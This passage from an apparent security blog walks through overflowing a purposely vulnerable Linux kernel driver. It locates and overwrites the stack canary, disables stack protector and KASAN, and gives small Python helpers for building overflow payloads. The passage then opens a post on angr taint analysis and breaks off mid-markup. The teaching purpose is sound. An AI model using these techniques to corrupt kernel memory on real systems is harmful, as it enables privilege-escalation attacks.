</p><p> </p><p>To find a better breakpoint, we disassemble the <span style="font-family: courier;">stacksmash_dev_write</span> function:</p><p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9WRiTvKnIYULMExQpWWMj7vxCiRs8uptSfLLfwY3lMqg7EWY8iJTh_CEtvTyURxqu1ql1tls5IKuHsR8hLWb8Cl7tqML1-3X0eFtjs_LLVVLsIiITUP0NeTHww_xCB3__rE-mcNNkCG8/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="340" data-original-width="862" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9WRiTvKnIYULMExQpWWMj7vxCiRs8uptSfLLfwY3lMqg7EWY8iJTh_CEtvTyURxqu1ql1tls5IKuHsR8hLWb8Cl7tqML1-3X0eFtjs_LLVVLsIiITUP0NeTHww_xCB3__rE-mcNNkCG8/s16000/Screenshot+from+2020-11-12+04-37-59.png" /></a></div><br /><br /></div><br /><p></p><p>At addresses <span style="font-family: courier;">0xffffffffa0000030</span> to <span style="font-family: courier;">0xffffffffa0000039</span> we can see the driver prepping the arguments for <span style="font-family: courier;">copy_from_user</span>, leaving us with:</p><ul style="text-align: left;"><li><span style="font-family: courier;">rdx</span> holding the size</li><li><span style="font-family: courier;">rsi</span> holding the source (our arg string of "a"'s)</li><li><span style="font-family: courier;">rdi</span> holding the destination<br /></li></ul><p>We choose some new breakpoints, one just before the
<span style="font-family: courier;">copy_from_user</span> call and one just after; we do this so we can peek at
the stack and find out how much damage the input did. To peek, we examine the memory that <span style="font-family: courier;">rdi</span> points to before and after the <span style="font-family: courier;">copy_from_user</span> call:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhVp-w5v-SVppWjtijEnN39MV3FBOxXi7ZkR1oQJFH1BELqJOx1GdgEYpZRPY0ZZWpLjkoHsl45-XuUcQSd0N-FrgEF_ZzDbD2UxCszIDC5UzO7TyMDbZNiLVtnQQiJItfYsNyaPtLi8Q/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="756" data-original-width="924" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhVp-w5v-SVppWjtijEnN39MV3FBOxXi7ZkR1oQJFH1BELqJOx1GdgEYpZRPY0ZZWpLjkoHsl45-XuUcQSd0N-FrgEF_ZzDbD2UxCszIDC5UzO7TyMDbZNiLVtnQQiJItfYsNyaPtLi8Q/s16000/Screenshot+from+2020-11-12+04-41-25.png" /></a></div><br /><p></p>Okay, we have a full view of what we're doing here; this is good. Now, before we can start building exploits, let's talk about some of the Linux kernel's security protections for stack memory, check which ones we have enabled, see how they work, and craft an exploit around them. </div><div> </div><div><i>*Also please note we're going to swap this driver out for another one that is again slightly modified to make exploitation a bit easier; here I made the mistake of not actually involving any stack variables! So please take this as a quick lesson in GDB fu and debugging kernel drivers, but if you'd like to follow along please switch to targeting this driver [<u>https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/stacksmash_driver.c</u>]. 
I hope this doesn't make it too hard to follow; I was also too lazy to redo the screenshots, hehe, they came out so neat!<br /></i></div><div><br /></div><div style="text-align: left;"><h2>Kernel Stack Memory Protection</h2></div>Let's look at the stuff in the kernel that makes modern stack exploitation so difficult (<i>I believe most of these are accessible via .config by prefixing the name with <span style="font-family: courier;">CONFIG_</span>, and can be toggled using the <span style="font-family: courier;">./scripts/config</span> script</i>): <div><ul style="text-align: left;"><li><span style="font-family: courier;"><b>STACKPROTECTOR</b></span>: Exploiting a stack overflow requires writing past the end of a buffer into the pointers on the stack. The kernel adds stack canaries to be able to detect when the stack was corrupted, and this option controls them. It depends on <span style="font-family: courier;">HAVE_STACKPROTECTOR</span>, which the architecture selects; to turn canaries off you disable <span style="font-family: courier;">STACKPROTECTOR</span> itself (<span style="font-family: courier;">STACKPROTECTOR_STRONG</span> depends on it, so it goes away too). <i>Another important thing to note is that this only instruments functions that "have an 8-byte or larger character array on the stack", which means there may be times a function doesn't get a stack protector despite an equivalent stack write operation, or perhaps a stack write is introduced by a compiler optimization?</i><br /></li><li><span style="font-family: courier;"><b>STACKPROTECTOR_STRONG</b></span>: This option widens the heuristics used to add canaries to functions. If it is enabled, canaries are also added to functions that use a local variable's address on the right-hand side of an assignment or as a function argument, that have any local array (of any type or length), or that use register local variables.<br /></li><li><span style="font-family: courier;"><b>INIT_STACK_NONE</b></span>: It is easy to leak information from uninitialized memory in the kernel, e.g. <i>a module uses an uninitialized memory pointer during an IOCTL, never clears or sets it, but writes it back to the user through some craftable call chain or invocation</i>. 
The problem is common enough that there's a config choice for initializing stack variables at function entry: <span style="font-family: courier;">INIT_STACK_NONE</span> leaves them alone, while the other sub-options zero-initialize progressively more of them, starting with stack structures that contain __user-marked members. Similar options exist for heap allocations. This obviously doesn't work out well for anyone making assumptions about non-null uninitialized values, but it certainly does solve a big problem. <br /></li><li><span style="font-family: courier;"><b>CONFIG_VMAP_STACK</b></span>: To help detect stack overflows, the kernel uses guard pages (<i>a somewhat related idea is <a href="https://en.wikipedia.org/wiki/Shadow_memory#:~:text=Shadow%20memory%20is%20a%20technique,more%20bytes%20in%20main%20memory.">shadow memory</a></i>, which is used to track memory behavior in static/dynamic analysis engines). For a userspace process, an inaccessible guard region sits just past the end of its stack, so <i>touching it triggers a segfault due to its page access rights</i>. Folks later figured out ways to skip over that guard region and make memory regions clash as they grow into each other; this was famously demonstrated by the Stack Clash exploits from the folks at Qualys, and the kernel responded by making the userspace stack guard gap much larger. <span style="font-family: courier;">VMAP_STACK </span>covers the kernel's own stacks: it allocates them from the vmalloc area, where allocations are separated by unmapped guard pages, so a kernel stack overflow faults immediately instead of silently corrupting adjacent memory. </li></ul><div><br /></div></div><div>We're not going to be turning any of these off just yet; it's important to know what exploitation is like in this state, and then slowly remove protections to show how and why they work. Now that we know what a modern kernel stack looks like and what we need to dance around, let's see if we can overwrite some structures in memory. 
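A quick way to see which of these are enabled in your build is to read them out of the kernel's .config. The sketch below assumes the standard CONFIG_X=value and # CONFIG_X is not set line formats, and its option list simply mirrors the bullets above. To flip one, the ./scripts/config script mentioned earlier can be used, for example ./scripts/config --disable STACKPROTECTOR followed by make olddefconfig.

```python
import re
import sys

# Options from the list above (without the CONFIG_ prefix).
OPTIONS = ["STACKPROTECTOR", "STACKPROTECTOR_STRONG", "INIT_STACK_NONE", "VMAP_STACK"]

SET_RE = re.compile(r"^CONFIG_(\w+)=(.*)$")
UNSET_RE = re.compile(r"^# CONFIG_(\w+) is not set$")


def read_config(text: str) -> dict:
    """Parse .config text into {option: value}, using 'n' for 'is not set' lines."""
    values = {}
    for line in text.splitlines():
        line = line.strip()
        m = SET_RE.match(line)
        if m:
            values[m.group(1)] = m.group(2)
            continue
        m = UNSET_RE.match(line)
        if m:
            values[m.group(1)] = "n"
    return values


def report(text: str) -> dict:
    """Value of each option of interest, or 'absent' if .config never mentions it."""
    values = read_config(text)
    return {opt: values.get(opt, "absent") for opt in OPTIONS}


if __name__ == "__main__" and len(sys.argv) == 2:
    with open(sys.argv[1]) as f:
        for opt, val in report(f.read()).items():
            print(f"CONFIG_{opt}={val}")
```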
Now that we know what a modern kernel stack looks like and what we need to dance around, let's see if we can overwrite some structures in memory. </div><div><br /></div><div><h2 style="text-align: left;">Destroying Kernel Stack</h2><ul style="text-align: left;"><li><b>Driver: </b><a href="https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/stacksmash_driver.c">https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/stacksmash_driver.c</a> <b> </b></li><li><b>Userspace App:</b> <a href="https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/stacksmash_app.c">https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/stacksmash_app.c</a><br /></li></ul><p> </p><p>Okay, now that we can write to memory, let's try to make that write count. We need to change a small detail in our driver: instead of simply making one huge <span style="font-family: courier;">copy_from_user</span>, it now <span style="font-family: courier;">memcpy</span>s the input string into a stack variable like so:</p><p> </p><p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY2hOtUWmmPcbdwFyo_QMNOJtyDllgSO93a-31HbU0SCOFSCghO3eXHShYsSG-AL79GLKTDuTOgnatsDLEYnOk2yy_xRLsZv9QybWHV7VmlIfYlo4QRuvDEkPJZJ25m0qOLNavKpZ10p0/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="377" data-original-width="1279" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY2hOtUWmmPcbdwFyo_QMNOJtyDllgSO93a-31HbU0SCOFSCghO3eXHShYsSG-AL79GLKTDuTOgnatsDLEYnOk2yy_xRLsZv9QybWHV7VmlIfYlo4QRuvDEkPJZJ25m0qOLNavKpZ10p0/s16000/stacksmash_changes-2020-11-27+16-10-47.png" /></a></div> </div><p></p><p><i>Another important change to mention is that from here on out I turned off KASAN, which can be done by making sure CONFIG_KASAN is not set when you 
compile your kernel. The reason is pretty simple: KASAN is annoyingly sensitive about memory accesses and triggers panics long before you can actually see what you're doing. </i></p><p>We now need to load up the driver as before, but this time we set some breakpoints that wrap the <span style="font-family: courier;">memcpy</span> like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBv-Czcbs7Zzo4SYPAt3tfvRa3z2CE5sMLy6PStwWvCd7AIsr16QtpedtekD8bEpXw3umOHZxKjV42Fgr4z1Bojm9ynwc2Qhn67t5kdVFzduaSAOtj4vxdADcGwdg5jESObhvDkmdL5uA/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="275" data-original-width="814" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBv-Czcbs7Zzo4SYPAt3tfvRa3z2CE5sMLy6PStwWvCd7AIsr16QtpedtekD8bEpXw3umOHZxKjV42Fgr4z1Bojm9ynwc2Qhn67t5kdVFzduaSAOtj4vxdADcGwdg5jESObhvDkmdL5uA/s16000/memcpy_breakpoint2020-11-27+01-36-36.png" /></a></div></div><div><i>*Having done this a couple of times now, I recommend only setting the breakpoint just after memcpy returns. 
This is more efficient if you know how to search through memory for the payload and other goodies.</i><br /><p></p><p>And if we write 17 bytes to the stack, for instance, we should see the following happen:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQGHWYmt2OJZucvQEZYypi0y6keMUI93jfKHD-XTaaf6VqTqfl_3WG0cSLdXhKh-WRmFbKrjhsOwFWSxwSp93dWotaJoMiSFL9Z21IHiwcCMcSGfHiQE22DBkY36F_9vCnjWvXN_WEhAY/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="710" data-original-width="886" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQGHWYmt2OJZucvQEZYypi0y6keMUI93jfKHD-XTaaf6VqTqfl_3WG0cSLdXhKh-WRmFbKrjhsOwFWSxwSp93dWotaJoMiSFL9Z21IHiwcCMcSGfHiQE22DBkY36F_9vCnjWvXN_WEhAY/s16000/Screenshot+from+2020-11-27+01-38-13.png" /></a></div> <br /><p></p><p><i>*Note the stack dump at the end; clearly we're hitting the right memory here. </i></p><p>Which results in the following kernel panic: </p><p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiuJ_QVhPqLD4VyTkAjJrNeneWAwwtjCDi5vv4iQj4yTuEHbChI-eR5McGoqeIYCF5cwyJqkMvcm99DiMDeszWfYXN8AEuHvdPihpuBReqDi0iW_UDdIRxC9n9Y0mL9v_fMXJrPa_feb8/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="59" data-original-width="1759" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiuJ_QVhPqLD4VyTkAjJrNeneWAwwtjCDi5vv4iQj4yTuEHbChI-eR5McGoqeIYCF5cwyJqkMvcm99DiMDeszWfYXN8AEuHvdPihpuBReqDi0iW_UDdIRxC9n9Y0mL9v_fMXJrPa_feb8/s16000/stack_corrupted2020-11-27+01-39-35.png" /></a></div></div><p></p>We're on the right track! One worrying detail: the kernel is complaining that the "Kernel stack is corrupted", which means we are overwriting the kernel stack canary value (<i>the one I mentioned in the section on memory protections</i>). 
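<p>To make the 16 vs 17 byte behavior concrete, here's a tiny Python model of the frame. The layout is an assumption for illustration only: a 16-byte <span style="font-family: courier;">target</span> buffer followed by the canary, the saved <span style="font-family: courier;">rbp</span> and the return address, which is a typical x86_64 arrangement with the stack protector on. The compiler is free to reorder locals or add padding, so confirm the real layout in gdb. <span style="font-family: courier;">make_payload</span> also mirrors the taint trick from earlier by optionally appending a marker like <span style="font-family: courier;">0x43434343</span> after the filler.</p>

```python
# Assumed frame layout, lowest address first. Hypothetical: verify in gdb.
FRAME_LAYOUT = [
    ("target[16]", 16),
    ("stack canary", 8),
    ("saved rbp", 8),
    ("return address", 8),
]


def slot_at(offset, layout=FRAME_LAYOUT):
    """Name the frame slot that byte `offset` of the payload lands in."""
    start = 0
    for name, size in layout:
        if start <= offset < start + size:
            return name
        start += size
    return "past the frame"


def make_payload(length, fill=b"A", taint=None):
    """`length` filler bytes, optionally followed by a 4-byte little-endian taint marker."""
    payload = fill * length
    if taint is not None:
        payload += taint.to_bytes(4, "little")
    return payload


for n in (16, 17):
    # The last byte written sits at offset n - 1.
    print(n, "bytes: last byte lands in", slot_at(n - 1))
```

<p>Under this assumed layout, dropping the canary entry from the list (as happens once the stack protector is disabled) moves that same 17th byte into the saved <span style="font-family: courier;">rbp</span> instead.</p>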
There are two approaches we can take here: 1) <i>get rid of the canary</i>: we cheat and contrive an example with no such memory protections, and explore how easy it is to exploit; or 2) <i>leak the canary</i>: we cheat in a different way and add a flaw to our driver that leaks the canary value.<i> </i>We're gonna do both! </div><div><br /></div><div>Let's make sure we know where the stack canary is, though. I've shown a couple of examples here (<i>these are taken from the breakpoint just after the <span style="font-family: courier;">memcpy</span> is hit, but I believe any breakpoint in the function should work</i>):</div><div> </div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBPitCV6UtZREVatchFZrJi852iKEgEuvrZ1kzWxUdP5gfogALp9n91SpwzNDNfoOPOoktq2crI7ajt2Y3qdZvo5a1yOl0ZBzTNGZQurE_6BNdzFOZZppYarCizAD9bNJXkarsZFOSjP8/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="168" data-original-width="734" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBPitCV6UtZREVatchFZrJi852iKEgEuvrZ1kzWxUdP5gfogALp9n91SpwzNDNfoOPOoktq2crI7ajt2Y3qdZvo5a1yOl0ZBzTNGZQurE_6BNdzFOZZppYarCizAD9bNJXkarsZFOSjP8/s16000/canary_example_1-2020-11-27+15-55-10.png" /></a></div><br /></div><div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiToVGQOCG3b1cftcg5G-plF1-0LTQ86GGPDfho-oNoGACkOQCRW7PIgsGkvo4WeDaZq2vhMOJ7ngQ2ajZYTb-VXaZPY0lWOupTGd6lQQCcL7pt0LBdnDuzUtY6dYgLrBpir95wnoZhCp4/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="139" data-original-width="731" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiToVGQOCG3b1cftcg5G-plF1-0LTQ86GGPDfho-oNoGACkOQCRW7PIgsGkvo4WeDaZq2vhMOJ7ngQ2ajZYTb-VXaZPY0lWOupTGd6lQQCcL7pt0LBdnDuzUtY6dYgLrBpir95wnoZhCp4/s16000/canary_example_2-2020-11-27+15-55-41.png" /></a></div><br /></div><div><br
/></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUVmhtP8xqH3d1sgj9yAn3JpAvebenRWLKZHT_ocYuZr1slACRa9TG-11oW5Yrq3BgA0SpI_1pMfIgwMlL2uH8nmLVaB_Fh1H3HFvhzz-BlD2eGCL6i9MyM2DzXmOThOM4HedXidPbPas/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="138" data-original-width="732" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUVmhtP8xqH3d1sgj9yAn3JpAvebenRWLKZHT_ocYuZr1slACRa9TG-11oW5Yrq3BgA0SpI_1pMfIgwMlL2uH8nmLVaB_Fh1H3HFvhzz-BlD2eGCL6i9MyM2DzXmOThOM4HedXidPbPas/s16000/canary_example_3-2020-11-27+15-56-12.png" /></a></div><br /><br /></div><div><br /></div><div>And to boot, we can be pretty confident that we are actually looking at a stack canary value by checking for the following markers:</div><div><ul style="text-align: left;"><li>They are usually tucked into the stack just before the stack frames of the calling functions start.</li><li>Stack canaries occupy a full register's worth of random-looking bytes (8 bytes on x86_64), so comparing that stack position across different runs of the function is a good test: the value there should look different each time.</li></ul><p>And lastly, when you overwrite them with even a single byte, the kernel panics with the stack-protector message again: <br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih0bzN8n7FUQ8gVRlWcUdOpWpYv6ibFk8eqiTlgrTg7Sz0JwcaIs21Ccf0XIcg6-ANnuBiDCyVwwaanI1uDgnTZR-PS6cnnjB_Zd_Yqo81s8ZGgFLAuR0tja5QxGYvC69hGn-n87UeEGQ/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="843" data-original-width="983" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih0bzN8n7FUQ8gVRlWcUdOpWpYv6ibFk8eqiTlgrTg7Sz0JwcaIs21Ccf0XIcg6-ANnuBiDCyVwwaanI1uDgnTZR-PS6cnnjB_Zd_Yqo81s8ZGgFLAuR0tja5QxGYvC69hGn-n87UeEGQ/s16000/Canary_Found-2020-11-27+14-58-46.png" /></a></div> <p></p><p>In the above screenshot we 
can see two separate runs of the <span style="font-family: courier;">stacksmash_driver</span>: the first one writes 16 bytes, the second 17. Note the difference in the behavior and stack layout. At address <span style="font-family: courier;">0xffffc90000015fea8</span> we can see the stack cookie overwritten by a single <span style="font-family: courier;">0x41</span>.</p><p>Cool, we're now well versed in setting breakpoints, finding the stack canary and disassembling the binary, so I'll try to keep the screenshots a little simpler from here on out while still showing as much as is needed to make my point. The next step is to explore our options in terms of memory protection, now that we can control our payload well and navigate memory structures to some extent. <br /></p></div><div><h2 style="text-align: left;">No Canaries, No Cares </h2></div><div>The first thing I'd like to experiment with is disabling the kernel's stack protector options entirely. We can turn them off by issuing the following commands and re-making the kernel:</div><div> </div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqawl1LZkYyJwKu3OSK4WNqjR7DsFxDDTzYQ8MLZwtcami97tPZMcIorMFNuR1S7EkFxzFNRLqNroQox9e5-XlobiQvmZK9t6U4uz_pNrhjBHs1MoWdfHzZ4rL3Bu5fM4IXs0tShQvXc4/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="574" data-original-width="644" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqawl1LZkYyJwKu3OSK4WNqjR7DsFxDDTzYQ8MLZwtcami97tPZMcIorMFNuR1S7EkFxzFNRLqNroQox9e5-XlobiQvmZK9t6U4uz_pNrhjBHs1MoWdfHzZ4rL3Bu5fM4IXs0tShQvXc4/s16000/remove_stackprotector.png" /></a></div><br /><br /></div><div><br /></div><div><i>You'll notice that some options don't get turned off; just ignore them for now. There is a way to force them off, but it involves scratching around with the Kconfig default values, which can turn into a mess really quickly, so I'm not going to advise that. 
Btw, this build will take a while as well, since it affects literally everything that runs in the kernel and requires recompiling everything!<br /></i></div><div><br /></div><div>Here's the behavior of the stack overflow when I write 17 bytes without <span style="font-family: courier;">CONFIG_STACKPROTECTOR</span> and <span style="font-family: courier;">CONFIG_STACKPROTECTOR_STRONG</span>:</div><div> </div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEUbFznjY_hgFVgK254b-9Wj1YnkQdkK2UsugbwsWeNBQLmCObR1UD-GHUHFPV8HAUeSNKAhuYqVJMrv8Lb7GXvafwaNLy_IR6_lX1QhgOeuUtajSgEHhZkCQ9JW7gm7HJiIjfUTSfqOk/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="303" data-original-width="738" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEUbFznjY_hgFVgK254b-9Wj1YnkQdkK2UsugbwsWeNBQLmCObR1UD-GHUHFPV8HAUeSNKAhuYqVJMrv8Lb7GXvafwaNLy_IR6_lX1QhgOeuUtajSgEHhZkCQ9JW7gm7HJiIjfUTSfqOk/s16000/no_stack_protector-2020-11-27+16-28-48.png" /></a></div><br /><br /></div><div>See? No strange, random-looking 64-bit values, and when we check the function exit epilogues we don't see any compares or checks against the canary. </div><div> </div><div>The next thing we need to do is try to corrupt some return pointers, but that requires me to actually know a little more about what I'm doing here, so I'm gonna need a little break to git guud. Please watch this space for the next post. 
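<p>A quick way to back up the epilogue check without eyeballing every function is to search the module's disassembly for references to <span style="font-family: courier;">__stack_chk_fail</span>, the kernel function that raises the "Kernel stack is corrupted" panic. This is a sketch that assumes GNU objdump output, e.g. from <span style="font-family: courier;">objdump -dr stacksmash_driver.ko</span>. The <span style="font-family: courier;">-r</span> matters because in an unlinked module the call target only shows up as a relocation. The function names in the sample are made up.</p>

```python
import re

# GNU objdump starts each function with a line like "0000000000000000 <name>:".
FUNC_HEADER = re.compile(r"^[0-9a-f]+ <([^>]+)>:$")


def functions_with_canary_check(disasm):
    """Return the functions whose disassembly references __stack_chk_fail."""
    protected = []
    current = None
    for line in disasm.splitlines():
        header = FUNC_HEADER.match(line.strip())
        if header:
            current = header.group(1)
        elif current and "__stack_chk_fail" in line and current not in protected:
            protected.append(current)
    return protected


# Hypothetical excerpt of `objdump -dr` output, shortened by hand.
sample = """
0000000000000000 <smash_write>:
   0:   55                      push   %rbp
  2a:   e8 00 00 00 00          call   2f <smash_write+0x2f>
                        2b: R_X86_64_PLT32      __stack_chk_fail-0x4

0000000000000040 <smash_init>:
  40:   c3                      ret
"""
print(functions_with_canary_check(sample))  # ['smash_write']
```

<p>On a build with <span style="font-family: courier;">CONFIG_STACKPROTECTOR</span> off, the list should come back empty for the driver.</p>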
</div><div> </div><div>Thanks for reading!<br /></div><div> </div><div><h2 style="text-align: left;">Reading and References</h2><ol style="text-align: left;"><li><a href="https://census-labs.com/media/bheu-2011-slides.pdf">https://census-labs.com/media/bheu-2011-slides.pdf</a></li><li><a href="https://papers.put.as/papers/macosx/2011/PROTECTING-THE-CORE-KERNEL-EXPLOITATION-MITIGATIONS-bheu-2011-wp.pdf">https://papers.put.as/papers/macosx/2011/PROTECTING-THE-CORE-KERNEL-EXPLOITATION-MITIGATIONS-bheu-2011-wp.pdf</a> <br /></li><li><a href="https://www.kernel.org/doc/html/latest/security/self-protection.html">https://www.kernel.org/doc/html/latest/security/self-protection.html</a> </li><li><a href="https://www.kernel.org/doc/Documentation/security/self-protection.txt">https://www.kernel.org/doc/Documentation/security/self-protection.txt</a> </li><li><a href="https://yoursunny.com/t/2018/one-kernel-module/">https://yoursunny.com/t/2018/one-kernel-module/</a> </li><li><a href="https://cs.stackexchange.com/questions/45159/can-someone-explain-this-diagram-about-slab-allocation">https://cs.stackexchange.com/questions/45159/can-someone-explain-this-diagram-about-slab-allocation</a></li><li><a href="https://blog.infosectcbr.com.au/2020/02/linux-kernel-stack-smashing.html">https://blog.infosectcbr.com.au/2020/02/linux-kernel-stack-smashing.html</a></li><li><a href="https://lwn.net/Articles/692208/">https://lwn.net/Articles/692208/</a> </li><li><a href="https://lwn.net/Articles/691631/">https://lwn.net/Articles/691631/</a></li><li><a href="https://lwn.net/Articles/725832/">https://lwn.net/Articles/725832/</a> </li><li><a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=320b2b8de12698082609ebbc1a17165727f4c893">https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=320b2b8de12698082609ebbc1a17165727f4c893</a> </li><li><a 
href="https://blog.qualys.com/vulnerabilities-research/2017/06/19/the-stack-clash">https://blog.qualys.com/vulnerabilities-research/2017/06/19/the-stack-clash</a> </li><li><a href="https://googleprojectzero.blogspot.com/2016/06/exploiting-recursion-in-linux-kernel_20.html">https://googleprojectzero.blogspot.com/2016/06/exploiting-recursion-in-linux-kernel_20.html</a> </li><li><a href="https://blog.aquasec.com/bugs-gone-wild-container-stack-clash-and-cve-2017-1000253">https://blog.aquasec.com/bugs-gone-wild-container-stack-clash-and-cve-2017-1000253</a> <br /></li></ol></div></div><p><b>SporeCrawler : Binary Taint Analysis with Angr</b> (2020-11-12)</p> <p>In this very brief post I'm going to share a tool I've built that does binary taint analysis using Angr. There really isn't much to talk about since the code is pretty readable and not complex, but I will also walk through a quick introduction to the concept and why it's cool. The post includes links to all the scripts used. I should mention that the tools used here are research tools: they have bugs, they don't always run smoothly and there's a bunch of cases they can't manage; but they do give you access to a pretty nifty technology, symbolic execution and taint analysis!</p><h2 style="text-align: left;">What is Taint Analysis?<br /></h2><p>Taint analysis is a program analysis method computer scientists and other researchers use to track the flow of data through a program. Essentially, one does taint analysis to see which points in a program's execution are influenced by user input. This is nifty because it helps narrow code analysis down to the most relevant sections of code. It also obviously helps guide fuzzing toward more fruitful areas of the code! 
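</p><p>To make the idea concrete before we get to angr, here's a toy forward taint propagation over straight-line code in Python. It's purely illustrative and is not how SporeCrawler or angr represent programs: each statement either assigns to a variable from some operands or calls a function, a variable becomes tainted when any operand is tainted (and untainted when overwritten by clean data), and a call is reported when any argument is tainted. Calls don't taint their arguments here, which a real analysis would have to model.</p>

```python
def find_tainted_calls(program, sources):
    """program: list of ("assign", dest, operands) or ("call", func, args) tuples."""
    tainted = set(sources)
    hits = []
    for kind, target, operands in program:
        flows = any(op in tainted for op in operands)
        if kind == "assign":
            if flows:
                tainted.add(target)
            else:
                tainted.discard(target)  # overwritten by untainted data
        elif kind == "call" and flows:
            hits.append(target)
    return hits


# Hypothetical straight-line program; argv1 is the user-controlled source.
program = [
    ("assign", "len", ["argv1"]),
    ("assign", "buf", ["const"]),
    ("call", "strcpy", ["buf", "argv1"]),
    ("call", "puts", ["buf"]),
    ("assign", "n", ["len", "const"]),
    ("call", "memcpy", ["dst", "src", "n"]),
]
print(find_tainted_calls(program, {"argv1"}))  # ['strcpy', 'memcpy']
```

<p>The point is that <span style="font-family: courier;">len</span> and <span style="font-family: courier;">n</span> pick up the taint from <span style="font-family: courier;">argv1</span> without ever being user input themselves, which is exactly the kind of indirect flow taint analysis is good at surfacing.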
</p><p> The script we're going to develop here simply prints out any dangerous C functions whose symbolic state is tainted by our input; that is, some part of the symbolic state (a register, a memory value, a file descriptor, etc.) was at some point dependent on our input. <br /></p><p>Taint analysis comes in two variants: <b>static</b>, which is based purely on analysis of the code and its definitions, and <b>dynamic</b>, which relies on actual execution and instrumentation to collect information. Each approach has its own drawbacks. Dynamic analysis, or any analysis that works purely by collecting live execution data, risks under-approximating behavior: it only sees the paths that the inputs it was given actually exercise. The opposite is true for static methods: because they reason about code and definitions rather than concrete executions, they often over-approximate and report more bugs or events than are actually feasible. Some research focuses on pruning and whittling down these results through various tricks and schemes, or on blending the two methods together.</p><p>To keep things to the point, in this post we will only focus on easy static taint analysis. The approach is easy to implement and relatively accurate; it just suffers from a couple of drawbacks that are sometimes manageable for real-world binaries. In future research I will hopefully provide some hacks to get Angr running a bit smoother for complex binaries.</p> <h2 style="text-align: left;">Claripy Annotations for Taint Analysis</h2><p>We're doing taint analysis using claripy's Annotations. These are basically classes that you can use to tag symbolic bitvectors or other AST elements. It turns out the constructors of claripy.BVS objects accept a special parameter for annotations. For now we're just going to use a blank instance of the base Annotation class in claripy. 
</p><p>Here's how you set up a symbolic execution run in Angr with an annotated ARGV input:</p><p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi35JWs6daJshExnMlMOdALEeLyB-7MBH8zGsixBefOlz8FIHaCsSBH-MagX_rKJ9SSHK6dGT93yuEPQjw7H6j2jGPnHg1Q5ECC1ZPGUT0hnU6O9wHOWN3teVXKShS5LFa-l4OmX7Bqe3A/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="106" data-original-width="1223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi35JWs6daJshExnMlMOdALEeLyB-7MBH8zGsixBefOlz8FIHaCsSBH-MagX_rKJ9SSHK6dGT93yuEPQjw7H6j2jGPnHg1Q5ECC1ZPGUT0hnU6O9wHOWN3teVXKShS5LFa-l4OmX7Bqe3A/s16000/Screenshot+from+2020-11-13+00-24-24.png" /></a></div><br /><br /></div><p></p><p>And then in the hooks we simply check whether any register is annotated. Bear in mind that under the System V AMD64 calling convention the first six integer or pointer arguments are passed in rdi, rsi, rdx, rcx, r8 and r9, and those arguments are often pointers to the data a function works on, so checking those registers for annotations first makes sense:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a 